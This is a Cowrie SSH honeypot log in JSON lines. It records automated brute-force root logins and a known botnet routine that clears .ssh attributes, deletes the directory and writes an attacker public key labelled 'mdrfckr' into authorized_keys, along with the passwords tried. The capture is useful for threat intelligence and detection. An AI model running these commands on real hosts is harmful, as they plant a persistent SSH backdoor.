03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:44:57.023631Z","src_ip":"139.59.14.27","session":"4e82313a9371"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:44:58.385510Z","src_ip":"139.59.14.27","session":"4e82313a9371"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:58.722007Z","src_ip":"139.59.14.27","session":"4e82313a9371"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:58.744137Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53912,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ceea1c93ac2","protocol":"ssh","message":"New connection: 212.227.235.229:53912 (1.2.3.4:22) [session: 0ceea1c93ac2]","sensor":"my-vps","timestamp":"2025-09-08T12:45:01.531916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:01.533206Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:01.666957Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#qwe123","message":"login attempt [root/!@#qwe123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:45:02.240220Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:45:02.564084Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:45:02.564942Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:45:02.565693Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:02.700186Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:45:02.988873Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:45:02.989893Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:45:03.125996Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:03.127278Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54646,"dst_ip":"1.2.3.4","dst_port":22,"session":"47c28b111626","protocol":"ssh","message":"New connection: 212.227.235.229:54646 (1.2.3.4:22) [session: 47c28b111626]","sensor":"my-vps","timestamp":"2025-09-08T12:45:03.257368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:03.258469Z","src_ip":"212.227.235.229","session":"47c28b111626"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:03.391222Z","src_ip":"212.227.235.229","session":"47c28b111626"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:45:03.963476Z","src_ip":"212.227.235.229","session":"47c28b111626"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:05.098961Z","src_ip":"212.227.235.229","session":"47c28b111626"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55376,"dst_ip":"1.2.3.4","dst_port":22,"session":"38de483171cc","protocol":"ssh","message":"New connection: 212.227.235.229:55376 (1.2.3.4:22) [session: 38de483171cc]","sensor":"my-vps","timestamp":"2025-09-08T12:45:05.227087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:05.227957Z","src_ip":"212.227.235.229","session":"38de483171cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:05.356666Z","src_ip":"212.227.235.229","session":"38de483171cc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:45:05.913913Z","src_ip":"212.227.235.229","session":"38de483171cc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:06.044156Z","src_ip":"212.227.235.229","session":"38de483171cc"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:06.045225Z","src_ip":"212.227.235.229","session":"0ceea1c93ac2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42912,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e2a299282bf","protocol":"ssh","message":"New connection: 212.227.235.229:42912 (1.2.3.4:22) [session: 1e2a299282bf]","sensor":"my-vps","timestamp":"2025-09-08T12:45:19.947421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:19.950872Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:20.248226Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.login.success","username":"root","password":"rooted","message":"login attempt [root/rooted] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:45:21.442300Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:45:22.095066Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:45:22.095729Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:45:22.096791Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:22.399963Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:45:23.047650Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:45:23.048547Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:45:23.350338Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:23.351257Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44240,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c55b18164d3","protocol":"ssh","message":"New connection: 212.227.235.229:44240 (1.2.3.4:22) [session: 0c55b18164d3]","sensor":"my-vps","timestamp":"2025-09-08T12:45:23.631927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:23.632843Z","src_ip":"212.227.235.229","session":"0c55b18164d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:23.923661Z","src_ip":"212.227.235.229","session":"0c55b18164d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:45:25.123067Z","src_ip":"212.227.235.229","session":"0c55b18164d3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:26.415934Z","src_ip":"212.227.235.229","session":"0c55b18164d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45768,"dst_ip":"1.2.3.4","dst_port":22,"session":"795a0fd7dec6","protocol":"ssh","message":"New connection: 212.227.235.229:45768 (1.2.3.4:22) [session: 795a0fd7dec6]","sensor":"my-vps","timestamp":"2025-09-08T12:45:26.705908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:26.707942Z","src_ip":"212.227.235.229","session":"795a0fd7dec6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:26.999288Z","src_ip":"212.227.235.229","session":"795a0fd7dec6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:45:28.168227Z","src_ip":"212.227.235.229","session":"795a0fd7dec6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:28.462022Z","src_ip":"212.227.235.229","session":"795a0fd7dec6"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:28.467098Z","src_ip":"212.227.235.229","session":"1e2a299282bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38086,"dst_ip":"1.2.3.4","dst_port":22,"session":"856c4d9f45b9","protocol":"ssh","message":"New connection: 212.227.235.229:38086 (1.2.3.4:22) [session: 856c4d9f45b9]","sensor":"my-vps","timestamp":"2025-09-08T12:45:29.146059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:45:29.147050Z","src_ip":"212.227.235.229","session":"856c4d9f45b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:45:29.311812Z","src_ip":"212.227.235.229","session":"856c4d9f45b9"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"Password1","message":"login attempt [sonar/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:45:30.013318Z","src_ip":"212.227.235.229","session":"856c4d9f45b9"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:45:31.181532Z","src_ip":"212.227.235.229","session":"856c4d9f45b9"}
